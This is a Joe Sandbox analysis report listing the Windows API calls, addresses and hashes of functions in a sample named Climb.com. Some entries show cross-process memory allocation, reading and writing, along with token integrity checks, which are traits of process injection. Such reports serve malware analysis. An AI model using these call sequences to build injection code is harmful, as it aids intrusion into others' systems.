                                                                                                                                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3897988419-0
                                                                                                                                                                          • Opcode ID: 03cbe79ec36f664215feefdfa1c504bcb219ce65931485470d6b10aea85af1e9
                                                                                                                                                                          • Instruction ID: 5c1961d50577d28a3e8ce70f1bcb76ab0911675e707b89c9635674698b7756ac
                                                                                                                                                                          • Opcode Fuzzy Hash: 03cbe79ec36f664215feefdfa1c504bcb219ce65931485470d6b10aea85af1e9
                                                                                                                                                                          • Instruction Fuzzy Hash: 3E0184B6A00209AFEB154F55DC44BEA7AADEB48755F140138F909D6121E7B1DDC0D760
                                                                                                                                                                          APIs
                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0011F2AE
                                                                                                                                                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 0011F2BC
                                                                                                                                                                          • Sleep.KERNEL32(00000000), ref: 0011F2C4
                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0011F2CE
                                                                                                                                                                          • Sleep.KERNEL32 ref: 0011F30A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2833360925-0
                                                                                                                                                                          • Opcode ID: 84cbed5fcb32c0827c69fbcc51c4c76f706e7f243813cb77d2fbc3f0dda1fa82
                                                                                                                                                                          • Instruction ID: 0681b1e4fc82ed6c6378dc470fa95f344fa449c3e25564bd67b6434925c62f74
                                                                                                                                                                          • Opcode Fuzzy Hash: 84cbed5fcb32c0827c69fbcc51c4c76f706e7f243813cb77d2fbc3f0dda1fa82
                                                                                                                                                                          • Instruction Fuzzy Hash: 97014C75D0161DDBCF08AFF4EC49AEEBB78FB09701F01046AE912B2660DB709595C7A1
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00111A60
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,001114E7,?,?,?), ref: 00111A6C
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001114E7,?,?,?), ref: 00111A7B
                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001114E7,?,?,?), ref: 00111A82
                                                                                                                                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00111A99
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 842720411-0
                                                                                                                                                                          • Opcode ID: 576c9e6282bfc58b4cdcea2ae43ba0c6aa79c5d845c789ca393274be95aef79d
                                                                                                                                                                          • Instruction ID: 239c03e2e53ce6e146100109b1d1ab2821148bb117ebf5f1a63f33294eb663f6
                                                                                                                                                                          • Opcode Fuzzy Hash: 576c9e6282bfc58b4cdcea2ae43ba0c6aa79c5d845c789ca393274be95aef79d
                                                                                                                                                                          • Instruction Fuzzy Hash: E00181B9601205BFDF154FA4FC48DAA3F6DEF853A4B210468F945C3260DB31DC808A60
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00111916
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00111922
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00111931
                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00111938
                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0011194E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 44706859-0
                                                                                                                                                                          • Opcode ID: 9dafc353f33ee6d1f56dfcaa24deb7d331a1dc113918504396a2bf5499d678f4
                                                                                                                                                                          • Instruction ID: 3cfb36d893e03ee0873025124ce1a730f0d3b873692e734fdff40189dba326f7
                                                                                                                                                                          • Opcode Fuzzy Hash: 9dafc353f33ee6d1f56dfcaa24deb7d331a1dc113918504396a2bf5499d678f4
                                                                                                                                                                          • Instruction Fuzzy Hash: E9F06279200305BBDB210FA5EC4DF963B6DEF8A7A0F110425FA45D7260CB70DC808A60
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00111976
                                                                                                                                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00111982
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00111991
                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00111998
                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001119AE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 44706859-0
                                                                                                                                                                          • Opcode ID: 6de8f4d8aaf9fb8690e206cc44f9679246a7c6363b076f91544dcab40e789732
                                                                                                                                                                          • Instruction ID: 7ca04faff43ebe3f8714967b23f5d246bf18dcfef14c17580be4004842b6be4c
                                                                                                                                                                          • Opcode Fuzzy Hash: 6de8f4d8aaf9fb8690e206cc44f9679246a7c6363b076f91544dcab40e789732
                                                                                                                                                                          • Instruction Fuzzy Hash: 17F06279200305BBDB214FA4EC59F963B6DFF8A7A0F110424FE45C7260CB70D8808A60
                                                                                                                                                                          APIs
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00120B24,?,00123D41,?,00000001,000F3AF4,?), ref: 00120CCB
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00120B24,?,00123D41,?,00000001,000F3AF4,?), ref: 00120CD8
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00120B24,?,00123D41,?,00000001,000F3AF4,?), ref: 00120CE5
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00120B24,?,00123D41,?,00000001,000F3AF4,?), ref: 00120CF2
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00120B24,?,00123D41,?,00000001,000F3AF4,?), ref: 00120CFF
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00120B24,?,00123D41,?,00000001,000F3AF4,?), ref: 00120D0C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                          • Opcode ID: 9f7abaf29c2ba99b194319ef1f4f33a499001c6d2f4251a188decd1d2c50acfd
                                                                                                                                                                          • Instruction ID: 4215e7a5f75d4468a30eee30a351c2a45f323c1e5199b3f0bc1a35df8dc49f04
                                                                                                                                                                          • Opcode Fuzzy Hash: 9f7abaf29c2ba99b194319ef1f4f33a499001c6d2f4251a188decd1d2c50acfd
                                                                                                                                                                          • Instruction Fuzzy Hash: 790190B1801B259FCB31AFA6E980816F6F5BF503153158B3ED19652932C7B0A964DE80
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 001165BF
                                                                                                                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 001165D6
                                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 001165EE
                                                                                                                                                                          • KillTimer.USER32(?,0000040A), ref: 0011660A
                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00116624
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3741023627-0
                                                                                                                                                                          • Opcode ID: 97c56321314204a168df5c197de3383e7a75f2764f24a8bbdac6b5ebb1ae75bd
                                                                                                                                                                          • Instruction ID: 4c7fe453b8574bd644f5f322681ce6238c438e2a5b53b39aa458b983068a7122
                                                                                                                                                                          • Opcode Fuzzy Hash: 97c56321314204a168df5c197de3383e7a75f2764f24a8bbdac6b5ebb1ae75bd
                                                                                                                                                                          • Instruction Fuzzy Hash: 6F018134500714ABEF385F20ED4EBDA7BB8FB01705F010669A586A14F1EBF1AAC4CB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 000EDAD2
                                                                                                                                                                            • Part of subcall function 000E2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,000EDB51,00181DC4,00000000,00181DC4,00000000,?,000EDB78,00181DC4,00000007,00181DC4,?,000EDF75,00181DC4), ref: 000E2D4E
                                                                                                                                                                            • Part of subcall function 000E2D38: GetLastError.KERNEL32(00181DC4,?,000EDB51,00181DC4,00000000,00181DC4,00000000,?,000EDB78,00181DC4,00000007,00181DC4,?,000EDF75,00181DC4,00181DC4), ref: 000E2D60
                                                                                                                                                                          • _free.LIBCMT ref: 000EDAE4
                                                                                                                                                                          • _free.LIBCMT ref: 000EDAF6
                                                                                                                                                                          • _free.LIBCMT ref: 000EDB08
                                                                                                                                                                          • _free.LIBCMT ref: 000EDB1A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: 28ceb21f9e7a3b77df6df51df9188ffb54907700bc8d4ac46fc9aaded749e188
                                                                                                                                                                          • Instruction ID: e0f6b7ba3010722fd53cd7ce4a01a3c4fc2b981486db9d8855c22858da6d6000
                                                                                                                                                                          • Opcode Fuzzy Hash: 28ceb21f9e7a3b77df6df51df9188ffb54907700bc8d4ac46fc9aaded749e188
                                                                                                                                                                          • Instruction Fuzzy Hash: E3F0FF3254828CAF8664EB5AF981C5A77FDEF047107990C06F109F7911CB20FCC08655
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 000E262E
                                                                                                                                                                            • Part of subcall function 000E2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,000EDB51,00181DC4,00000000,00181DC4,00000000,?,000EDB78,00181DC4,00000007,00181DC4,?,000EDF75,00181DC4), ref: 000E2D4E
                                                                                                                                                                            • Part of subcall function 000E2D38: GetLastError.KERNEL32(00181DC4,?,000EDB51,00181DC4,00000000,00181DC4,00000000,?,000EDB78,00181DC4,00000007,00181DC4,?,000EDF75,00181DC4,00181DC4), ref: 000E2D60
                                                                                                                                                                          • _free.LIBCMT ref: 000E2640
                                                                                                                                                                          • _free.LIBCMT ref: 000E2653
                                                                                                                                                                          • _free.LIBCMT ref: 000E2664
                                                                                                                                                                          • _free.LIBCMT ref: 000E2675
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: 60bc1103373f8bee558e68d7eeb2ee1565c8e42e61111bb65dcdcfa421c378b1
                                                                                                                                                                          • Instruction ID: 3fd3a6e66e129929f95a20e6827288d3a31b69144eb4af6a32fea5b13c33885d
                                                                                                                                                                          • Opcode Fuzzy Hash: 60bc1103373f8bee558e68d7eeb2ee1565c8e42e61111bb65dcdcfa421c378b1
                                                                                                                                                                          • Instruction Fuzzy Hash: A8F0DA758051689F8712EF55FC018883BBDBF28B613050A0AF518B6A76C7310AD2AF86
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __freea$_free
                                                                                                                                                                          • String ID: a/p$am/pm
                                                                                                                                                                          • API String ID: 3432400110-3206640213
                                                                                                                                                                          • Opcode ID: 550a272d215057836645ed57ab8a75346808a5c608550a711c994d73cafd60da
                                                                                                                                                                          • Instruction ID: c592ff7671d798b3140c0715c4f913b1cc6ef8c3aab9cc0072d1ba6d52e4415b
                                                                                                                                                                          • Opcode Fuzzy Hash: 550a272d215057836645ed57ab8a75346808a5c608550a711c994d73cafd60da
                                                                                                                                                                          • Instruction Fuzzy Hash: 7ED1F175900286DECB689F6AC8557FEB7F1FF45700F28415AE942BB291D3359E80CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0011BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00112B1D,?,?,00000034,00000800,?,00000034), ref: 0011BDF4
                                                                                                                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 001130AD
                                                                                                                                                                            • Part of subcall function 0011BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00112B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 0011BDBF
                                                                                                                                                                            • Part of subcall function 0011BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 0011BD1C
                                                                                                                                                                            • Part of subcall function 0011BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00112AE1,00000034,?,?,00001004,00000000,00000000), ref: 0011BD2C
                                                                                                                                                                            • Part of subcall function 0011BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00112AE1,00000034,?,?,00001004,00000000,00000000), ref: 0011BD42
                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0011311A
                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00113167
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                          • String ID: @
                                                                                                                                                                          • API String ID: 4150878124-2766056989
                                                                                                                                                                          • Opcode ID: 989d4211e08eef45f7d9491270bfd87c0d4246c643d6bdccdafa067e336b7971
                                                                                                                                                                          • Instruction ID: 95ac6d8fd45503b23e0546b43c426b801aa888cca5affbd6025a15b0ecda9543
                                                                                                                                                                          • Opcode Fuzzy Hash: 989d4211e08eef45f7d9491270bfd87c0d4246c643d6bdccdafa067e336b7971
                                                                                                                                                                          • Instruction Fuzzy Hash: 12414976900218BEDF14DBA4CC81ADEBBB8EF49304F0040A9FA55B7184DB706F85CB61
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user~1\AppData\Local\Temp\768400\Climb.com,00000104), ref: 000E1AD9
                                                                                                                                                                          • _free.LIBCMT ref: 000E1BA4
                                                                                                                                                                          • _free.LIBCMT ref: 000E1BAE
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                          • String ID: C:\Users\user~1\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                          • API String ID: 2506810119-3461223814
                                                                                                                                                                          • Opcode ID: c684d1c9b396c095be1c6cdd480793191cf7c90ad5bb6cc40030327e440faa99
                                                                                                                                                                          • Instruction ID: 8644f65c3170dd0f7519d15298d514bc532306fabe0e3480a9bef305dcff30f7
                                                                                                                                                                          • Opcode Fuzzy Hash: c684d1c9b396c095be1c6cdd480793191cf7c90ad5bb6cc40030327e440faa99
                                                                                                                                                                          • Instruction Fuzzy Hash: 6B319671A04258AFCB21DF9ADC85DEEBBFDEF85710B1441A6F804A7211E7708E81CB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0011CBB1
                                                                                                                                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 0011CBF7
                                                                                                                                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,001829C0,00DEF7D8), ref: 0011CC40
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Menu$Delete$InfoItem
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 135850232-4108050209
                                                                                                                                                                          • Opcode ID: 6c73705db17417c902c4959818a17d75372740a2419908420b4c9bd0d98e7ebb
                                                                                                                                                                          • Instruction ID: 02627325dd87705d0fb6e6b2f3ee27a06f61e59dc7765e03360008ec9bd85546
                                                                                                                                                                          • Opcode Fuzzy Hash: 6c73705db17417c902c4959818a17d75372740a2419908420b4c9bd0d98e7ebb
                                                                                                                                                                          • Instruction Fuzzy Hash: 4A41C3312443029FD728DF24D884B9ABBE4AF85714F04462DF46997391CB30E984CBD6
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0014DCD0,00000000,?,?,?,?), ref: 00144F48
                                                                                                                                                                          • GetWindowLongW.USER32 ref: 00144F65
                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00144F75
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Long
                                                                                                                                                                          • String ID: SysTreeView32
                                                                                                                                                                          • API String ID: 847901565-1698111956
